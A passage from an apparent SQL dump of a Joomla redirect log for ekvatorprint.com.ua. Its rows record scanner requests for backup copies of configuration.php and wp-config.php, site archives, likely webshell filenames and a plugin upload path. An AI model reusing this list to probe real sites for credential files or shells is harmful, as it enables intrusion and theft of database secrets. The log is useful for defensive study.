00:00:00',301),(13392,'http://ekvatorprint.com.ua/configuration.php.7z',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 21:55:43','0000-00-00 00:00:00',301),(13393,'http://ekvatorprint.com.ua/configuration.php.Z',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-11 23:29:54','0000-00-00 00:00:00',301),(13394,'http://ekvatorprint.com.ua/configuration.php.back',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 01:09:03','0000-00-00 00:00:00',301),(13395,'http://ekvatorprint.com.ua/configuration.php.backup',NULL,'http://ekvatorprint.com.ua/','',2,0,'2018-05-12 02:41:56','0000-00-00 00:00:00',301),(13396,'http://ekvatorprint.com.ua/configuration.php.bakup',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 04:19:08','0000-00-00 00:00:00',301),(13397,'http://ekvatorprint.com.ua/configuration.php.bas',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 05:59:33','0000-00-00 00:00:00',301),(13398,'http://ekvatorprint.com.ua/configuration.php.bz2',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 07:41:40','0000-00-00 00:00:00',301),(13399,'http://ekvatorprint.com.ua/configuration.php.c',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 09:23:32','0000-00-00 00:00:00',301),(13400,'http://ekvatorprint.com.ua/configuration.php.conf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 11:11:42','0000-00-00 00:00:00',301),(13401,'http://ekvatorprint.com.ua/configuration.php.copia',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 12:58:34','0000-00-00 00:00:00',301),(13402,'http://ekvatorprint.com.ua/configuration.php.core',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 14:41:47','0000-00-00 00:00:00',301),(13403,'http://ekvatorprint.com.ua/configuration.php.cpp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 16:20:28','0000-00-00 00:00:00',301),(13404,'http://ekvatorprint.com.ua/configuration.php.dat',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 18:06:43','0000-00-00 00:00:00',301),(13405,'http://ekvatorprint.com.ua/configuration.php.db',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 19:40:39','0000-00-00 00:00:00',301),(13406,'http://ekvatorprint.com.ua/configuration.php.default',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 21:24:13','0000-00-00 00:00:00',301),(13407,'http://ekvatorprint.com.ua/configuration.php.dll',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-12 23:04:21','0000-00-00 00:00:00',301),(13408,'http://ekvatorprint.com.ua/configuration.php.doc',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 00:46:17','0000-00-00 00:00:00',301),(13409,'http://ekvatorprint.com.ua/forum/index.php',NULL,'http://ekvatorprint.com.ua/forum/index.php','',3,0,'2018-05-13 01:49:57','0000-00-00 00:00:00',301),(13410,'http://ekvatorprint.com.ua/configuration.php.ini',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 02:28:46','0000-00-00 00:00:00',301),(13411,'http://ekvatorprint.com.ua/configuration.php.jar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 04:08:53','0000-00-00 00:00:00',301),(13412,'http://ekvatorprint.com.ua/configuration.php.java',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 05:51:04','0000-00-00 00:00:00',301),(13413,'http://ekvatorprint.com.ua/configuration.php.orig',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 07:27:23','0000-00-00 00:00:00',301),(13414,'http://ekvatorprint.com.ua/configuration.php.pas',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 09:00:18','0000-00-00 00:00:00',301),(13415,'http://ekvatorprint.com.ua/configuration.php.rar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 10:47:31','0000-00-00 00:00:00',301),(13416,'http://ekvatorprint.com.ua/configuration.php.sav',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 12:25:38','0000-00-00 00:00:00',301),(13417,'http://ekvatorprint.com.ua/configuration.php.saved',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 13:59:50','0000-00-00 00:00:00',301),(13418,'http://ekvatorprint.com.ua/configuration.php.source',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 15:35:36','0000-00-00 00:00:00',301),(13419,'http://ekvatorprint.com.ua/configuration.php.src',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 17:22:21','0000-00-00 00:00:00',301),(13420,'http://ekvatorprint.com.ua/configuration.php.stackdump',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 18:52:49','0000-00-00 00:00:00',301),(13421,'http://ekvatorprint.com.ua/configuration.php.tar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 20:24:27','0000-00-00 00:00:00',301),(13422,'http://ekvatorprint.com.ua/configuration.php.tar.gz',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 21:56:17','0000-00-00 00:00:00',301),(13423,'http://ekvatorprint.com.ua/configuration.php.temp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-13 23:34:20','0000-00-00 00:00:00',301),(13424,'http://ekvatorprint.com.ua/configuration.php.test',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-14 01:10:35','0000-00-00 00:00:00',301),(13425,'http://ekvatorprint.com.ua/configuration.php.tgz',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-14 02:46:49','0000-00-00 00:00:00',301),(13426,'http://ekvatorprint.com.ua/configuration.php.tmp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-14 04:15:29','0000-00-00 00:00:00',301),(13427,'http://ekvatorprint.com.ua/configuration.php.war',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-14 07:29:24','0000-00-00 00:00:00',301),(13428,'http://ekvatorprint.com.ua/configuration.php.zip',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-14 09:10:32','0000-00-00 00:00:00',301),(13429,'http://ekvatorprint.com.ua/configuration.php copy.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-14 13:42:39','0000-00-00 00:00:00',301),(13430,'http://ekvatorprint.com.ua/Copy of configuration.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-14 15:36:15','0000-00-00 00:00:00',301),(13431,'http://ekvatorprint.com.ua/wp-config.php.001',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-14 21:36:05','0000-00-00 00:00:00',301),(13432,'http://ekvatorprint.com.ua/wp-config.php.002',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-14 23:01:20','0000-00-00 00:00:00',301),(13433,'http://ekvatorprint.com.ua/wp-config.php.1',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 00:18:15','0000-00-00 00:00:00',301),(13434,'http://ekvatorprint.com.ua/wp-config.php.2',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 01:42:31','0000-00-00 00:00:00',301),(13435,'http://ekvatorprint.com.ua/wp-config.php.7z',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 03:04:27','0000-00-00 00:00:00',301),(13436,'http://ekvatorprint.com.ua/wp-config.php.Z',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 04:25:56','0000-00-00 00:00:00',301),(13437,'http://ekvatorprint.com.ua/wp-config.php.back',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 05:52:53','0000-00-00 00:00:00',301),(13438,'http://ekvatorprint.com.ua/wp-config.php.backup',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 07:16:47','0000-00-00 00:00:00',301),(13439,'http://ekvatorprint.com.ua/wp-config.php.bakup',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 08:37:47','0000-00-00 00:00:00',301),(13440,'http://ekvatorprint.com.ua/smalls.php',NULL,'','',3,0,'2018-05-15 08:56:25','0000-00-00 00:00:00',301),(13441,'http://ekvatorprint.com.ua/wp-config.php.bas',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 09:55:15','0000-00-00 00:00:00',301),(13442,'http://ekvatorprint.com.ua/wp-config.php.bz2',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 11:12:13','0000-00-00 00:00:00',301),(13443,'http://ekvatorprint.com.ua/wp-config.php.c',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 12:32:24','0000-00-00 00:00:00',301),(13444,'http://ekvatorprint.com.ua/wp-config.php.conf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 13:44:11','0000-00-00 00:00:00',301),(13445,'http://ekvatorprint.com.ua/wp-config.php.copia',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 15:03:23','0000-00-00 00:00:00',301),(13446,'http://ekvatorprint.com.ua/wp-config.php.core',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 16:25:21','0000-00-00 00:00:00',301),(13447,'http://ekvatorprint.com.ua/wp-config.php.cpp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 17:40:43','0000-00-00 00:00:00',301),(13448,'http://ekvatorprint.com.ua/wp-config.php.dat',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 19:07:21','0000-00-00 00:00:00',301),(13449,'http://ekvatorprint.com.ua/wp-config.php.db',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 20:34:23','0000-00-00 00:00:00',301),(13450,'http://ekvatorprint.com.ua/wp-config.php.default',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 21:51:09','0000-00-00 00:00:00',301),(13451,'http://ekvatorprint.com.ua/wp-config.php.dll',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-15 23:11:23','0000-00-00 00:00:00',301),(13452,'http://ekvatorprint.com.ua/wp-config.php.doc',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 00:37:05','0000-00-00 00:00:00',301),(13453,'http://ekvatorprint.com.ua/wp-config.php.ini',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 02:01:10','0000-00-00 00:00:00',301),(13454,'http://ekvatorprint.com.ua/wp-config.php.jar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 03:18:38','0000-00-00 00:00:00',301),(13455,'http://ekvatorprint.com.ua/wp-config.php.java',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 04:37:53','0000-00-00 00:00:00',301),(13456,'http://ekvatorprint.com.ua/wp-config.php.pas',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 07:19:29','0000-00-00 00:00:00',301),(13457,'http://ekvatorprint.com.ua/wp-config.php.rar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 08:35:17','0000-00-00 00:00:00',301),(13458,'http://ekvatorprint.com.ua/imdex.php',NULL,'','',2,0,'2018-05-16 09:37:19','0000-00-00 00:00:00',301),(13459,'http://ekvatorprint.com.ua/wp-config.php.sav',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 09:56:20','0000-00-00 00:00:00',301),(13460,'http://ekvatorprint.com.ua/wp-config.php.saved',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 11:14:28','0000-00-00 00:00:00',301),(13461,'http://ekvatorprint.com.ua/wp-config.php.source',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 12:37:38','0000-00-00 00:00:00',301),(13462,'http://ekvatorprint.com.ua/d2fbe4758e64e01c726c42997d3d62f8',NULL,'https://a.pr-cy.ru/ekvatorprint.com.ua','',1,0,'2018-05-16 12:53:32','0000-00-00 00:00:00',301),(13463,'http://ekvatorprint.com.ua/wp-config.php.src',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 13:59:10','0000-00-00 00:00:00',301),(13464,'http://ekvatorprint.com.ua/wp-config.php.stackdump',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 15:14:35','0000-00-00 00:00:00',301),(13465,'http://ekvatorprint.com.ua/wp-config.php.tar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 16:32:38','0000-00-00 00:00:00',301),(13466,'http://ekvatorprint.com.ua/wp-config.php.tar.gz',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 17:54:23','0000-00-00 00:00:00',301),(13467,'http://ekvatorprint.com.ua/wp-config.php.temp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 19:18:57','0000-00-00 00:00:00',301),(13468,'http://ekvatorprint.com.ua/wp-config.php.test',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 20:39:34','0000-00-00 00:00:00',301),(13469,'http://ekvatorprint.com.ua/wp-config.php.tgz',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 21:57:35','0000-00-00 00:00:00',301),(13470,'http://ekvatorprint.com.ua/wp-config.php.tmp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-16 23:18:40','0000-00-00 00:00:00',301),(13471,'http://ekvatorprint.com.ua/wp-config.php.war',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-17 02:07:23','0000-00-00 00:00:00',301),(13472,'http://ekvatorprint.com.ua/wp-config.php.zip',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-17 03:33:58','0000-00-00 00:00:00',301),(13473,'http://ekvatorprint.com.ua/wp-config.php copy.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-17 06:58:45','0000-00-00 00:00:00',301),(13474,'http://ekvatorprint.com.ua/Copy of wp-config.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-17 08:12:17','0000-00-00 00:00:00',301),(13475,'http://ekvatorprint.com.ua/backup.001',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-17 13:40:56','0000-00-00 00:00:00',301),(13476,'http://ekvatorprint.com.ua/backup.002',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-17 15:03:22','0000-00-00 00:00:00',301),(13477,'http://ekvatorprint.com.ua/backup.1',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-17 16:30:10','0000-00-00 00:00:00',301),(13478,'http://ekvatorprint.com.ua/local.xml',NULL,'','',1,0,'2018-05-17 17:38:40','0000-00-00 00:00:00',301),(13479,'http://ekvatorprint.com.ua/backup.2',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-17 17:51:18','0000-00-00 00:00:00',301),(13480,'http://ekvatorprint.com.ua/backup.Z',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-17 20:53:28','0000-00-00 00:00:00',301),(13481,'http://ekvatorprint.com.ua/backup.back',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-17 22:30:22','0000-00-00 00:00:00',301),(13482,'http://ekvatorprint.com.ua/backup.bak',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 00:15:17','0000-00-00 00:00:00',301),(13483,'http://ekvatorprint.com.ua/backup.bakup',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 01:56:27','0000-00-00 00:00:00',301),(13484,'http://ekvatorprint.com.ua/backup.bas',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 03:30:17','0000-00-00 00:00:00',301),(13485,'http://ekvatorprint.com.ua/backup.c',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 05:04:38','0000-00-00 00:00:00',301),(13486,'http://ekvatorprint.com.ua/backup.conf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 06:47:25','0000-00-00 00:00:00',301),(13487,'http://ekvatorprint.com.ua/backup.core',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 07:38:38','0000-00-00 00:00:00',301),(13488,'http://ekvatorprint.com.ua/backup.cpp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 08:15:06','0000-00-00 00:00:00',301),(13489,'http://ekvatorprint.com.ua/backup.db',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 09:17:47','0000-00-00 00:00:00',301),(13490,'http://ekvatorprint.com.ua/backup.default',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 09:36:43','0000-00-00 00:00:00',301),(13491,'http://ekvatorprint.com.ua/backup.dll',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 09:55:03','0000-00-00 00:00:00',301),(13492,'http://ekvatorprint.com.ua/backup.doc',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 10:13:46','0000-00-00 00:00:00',301),(13493,'http://ekvatorprint.com.ua/backup.java',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 12:15:57','0000-00-00 00:00:00',301),(13494,'http://ekvatorprint.com.ua/backup.pas',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 13:42:20','0000-00-00 00:00:00',301),(13495,'http://ekvatorprint.com.ua/lieats.php',NULL,'','',1,0,'2018-05-18 13:44:05','0000-00-00 00:00:00',301),(13496,'http://ekvatorprint.com.ua/backup.sav',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 14:07:56','0000-00-00 00:00:00',301),(13497,'http://ekvatorprint.com.ua/backup.stackdump',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 15:56:25','0000-00-00 00:00:00',301),(13498,'http://ekvatorprint.com.ua/backup.txt',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 17:46:36','0000-00-00 00:00:00',301),(13499,'http://ekvatorprint.com.ua/backup.war',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 18:09:42','0000-00-00 00:00:00',301),(13500,'http://ekvatorprint.com.ua/backup~/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 18:45:43','0000-00-00 00:00:00',301),(13501,'http://ekvatorprint.com.ua/backup copy.php',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 20:46:21','0000-00-00 00:00:00',301),(13502,'http://ekvatorprint.com.ua/Copy of backup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 21:12:53','0000-00-00 00:00:00',301),(13503,'http://ekvatorprint.com.ua/.backup.swp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 22:13:28','0000-00-00 00:00:00',301),(13504,'http://ekvatorprint.com.ua/localhost.001',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 22:52:18','0000-00-00 00:00:00',301),(13505,'http://ekvatorprint.com.ua/localhost.1',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 23:35:54','0000-00-00 00:00:00',301),(13506,'http://ekvatorprint.com.ua/localhost.2',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-18 23:56:10','0000-00-00 00:00:00',301),(13507,'http://ekvatorprint.com.ua/localhost.Z',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 00:43:32','0000-00-00 00:00:00',301),(13508,'http://ekvatorprint.com.ua/localhost.c',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 03:32:43','0000-00-00 00:00:00',301),(13509,'http://ekvatorprint.com.ua/localhost.cpp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 05:37:33','0000-00-00 00:00:00',301),(13510,'http://ekvatorprint.com.ua/localhost.dat',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 05:59:21','0000-00-00 00:00:00',301),(13511,'http://ekvatorprint.com.ua/localhost.db',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 06:23:42','0000-00-00 00:00:00',301),(13512,'http://ekvatorprint.com.ua/localhost.dll',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 07:04:50','0000-00-00 00:00:00',301),(13513,'http://ekvatorprint.com.ua/localhost.doc',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 07:27:33','0000-00-00 00:00:00',301),(13514,'http://ekvatorprint.com.ua/localhost.jar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 08:07:45','0000-00-00 00:00:00',301),(13515,'http://ekvatorprint.com.ua/localhost.orig',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 09:11:46','0000-00-00 00:00:00',301),(13516,'http://ekvatorprint.com.ua/f8869cf36c3a37fc98c955c49289573d',NULL,'https://a.pr-cy.ru/ekvatorprint.com.ua','',1,0,'2018-05-19 09:35:10','0000-00-00 00:00:00',301),(13517,'http://ekvatorprint.com.ua/localhost.sav',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 10:19:32','0000-00-00 00:00:00',301),(13518,'http://ekvatorprint.com.ua/localhost.src',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 11:31:14','0000-00-00 00:00:00',301),(13519,'http://ekvatorprint.com.ua/localhost.temp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 13:33:17','0000-00-00 00:00:00',301),(13520,'http://ekvatorprint.com.ua/localhost.tmp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 15:01:43','0000-00-00 00:00:00',301),(13521,'http://ekvatorprint.com.ua/localhost.txt',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 15:23:48','0000-00-00 00:00:00',301),(13522,'http://ekvatorprint.com.ua/localhost.war',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 15:58:48','0000-00-00 00:00:00',301),(13523,'http://ekvatorprint.com.ua/localhost~/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 17:16:05','0000-00-00 00:00:00',301),(13524,'http://ekvatorprint.com.ua/ghfhvvaw.php',NULL,'','',2,0,'2018-05-19 19:04:33','0000-00-00 00:00:00',301),(13525,'http://ekvatorprint.com.ua/localhost.save',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 20:11:31','0000-00-00 00:00:00',301),(13526,'http://ekvatorprint.com.ua/localhost.swp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 22:20:43','0000-00-00 00:00:00',301),(13527,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.001',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-19 23:29:20','0000-00-00 00:00:00',301),(13528,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.002',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 00:39:49','0000-00-00 00:00:00',301),(13529,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.1',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 01:22:39','0000-00-00 00:00:00',301),(13530,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.2',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 02:07:10','0000-00-00 00:00:00',301),(13531,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.Z',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 04:28:44','0000-00-00 00:00:00',301),(13532,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.back',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 05:32:43','0000-00-00 00:00:00',301),(13533,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.backup',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 06:42:27','0000-00-00 00:00:00',301),(13534,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.bakup',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 08:17:17','0000-00-00 00:00:00',301),(13535,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.bas',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 09:18:26','0000-00-00 00:00:00',301),(13536,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.bz2',NULL,'http://ekvatorprint.com.ua/','',2,0,'2018-05-20 10:08:07','0000-00-00 00:00:00',301),(13537,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.c',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 11:38:23','0000-00-00 00:00:00',301),(13538,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.conf',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 14:04:47','0000-00-00 00:00:00',301),(13539,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.copia',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 16:26:29','0000-00-00 00:00:00',301),(13540,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.core',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 18:50:57','0000-00-00 00:00:00',301),(13541,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.cpp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 21:19:38','0000-00-00 00:00:00',301),(13542,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.dat',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-20 23:28:03','0000-00-00 00:00:00',301),(13543,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.db',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-21 01:58:58','0000-00-00 00:00:00',301),(13544,'http://ekvatorprint.com.ua/index.php?page=shop.recommend&tmpl=component&option=com_virtuemart',NULL,'','',1,0,'2018-05-21 03:32:51','0000-00-00 00:00:00',301),(13545,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.default',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-21 04:50:17','0000-00-00 00:00:00',301),(13546,'http://ekvatorprint.com.ua/wpcache.php?_=1',NULL,'','',2,0,'2018-05-21 05:41:57','0000-00-00 00:00:00',301),(13547,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.dll',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-21 07:26:48','0000-00-00 00:00:00',301),(13548,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.doc',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-21 09:29:57','0000-00-00 00:00:00',301),(13549,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.ini',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-21 11:30:28','0000-00-00 00:00:00',301),(13550,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.jar',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-21 12:57:41','0000-00-00 00:00:00',301),(13551,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.java',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-21 15:16:26','0000-00-00 00:00:00',301),(13552,'http://ekvatorprint.com.ua/rsau.php',NULL,'','',2,0,'2018-05-21 16:20:13','0000-00-00 00:00:00',301),(13553,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.old',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-21 17:58:44','0000-00-00 00:00:00',301),(13554,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.orig',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-21 20:24:33','0000-00-00 00:00:00',301),(13555,'http://ekvatorprint.com.ua/xmirpc.php?u=1',NULL,'','',2,0,'2018-05-21 22:17:42','0000-00-00 00:00:00',301),(13556,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.pas',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-21 22:44:52','0000-00-00 00:00:00',301),(13557,'http://ekvatorprint.com.ua/controller.php',NULL,'','',2,0,'2018-05-22 00:14:35','0000-00-00 00:00:00',301),(13558,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.sav',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-22 03:16:52','0000-00-00 00:00:00',301),(13559,'http://ekvatorprint.com.ua/modules/­simpleslideshow/­uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/','',1,0,'2018-05-22 05:27:30','0000-00-00 00:00:00',301),(13560,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.saved',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-22 05:56:19','0000-00-00 00:00:00',301),(13561,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.source',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-22 08:27:56','0000-00-00 00:00:00',301),(13562,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.src',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-22 10:20:16','0000-00-00 00:00:00',301),(13563,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.stackdump',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-22 12:31:31','0000-00-00 00:00:00',301),(13564,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.temp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-22 20:35:25','0000-00-00 00:00:00',301),(13565,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.test',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-22 22:22:54','0000-00-00 00:00:00',301),(13566,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.tmp',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-23 03:05:21','0000-00-00 00:00:00',301),(13567,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.txt',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-23 05:14:20','0000-00-00 00:00:00',301),(13568,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.war',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-05-23 07:31:14','0000-00-00 